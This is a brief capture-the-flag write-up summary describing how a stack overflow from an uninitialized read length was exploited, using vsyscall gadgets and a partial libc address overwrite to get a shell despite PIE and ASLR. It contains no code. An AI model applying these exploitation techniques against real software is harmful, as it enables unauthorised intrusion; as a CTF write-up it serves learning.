An uninitialized value is being used as the amount of bytes that is being read from the user in a `read()` call.
This results in a stack-overflow, where both PIE and ASLR are enabled -- and we have no leaks!

The way we deal with it is using a `vsyscall` gadget, which allows us to "slide" in the stack until we can partially-overwrite a libc address.
From there, we partially overwrite it to make it jump to a **PATCHED-IN** gadget (the given libc had an additional gadget), and finally get a shell!

Original writeup (https://github.com/perfectblue/ctf-writeups/blob/master/whitehat-grandprix-2018/pwn03_onehit.md).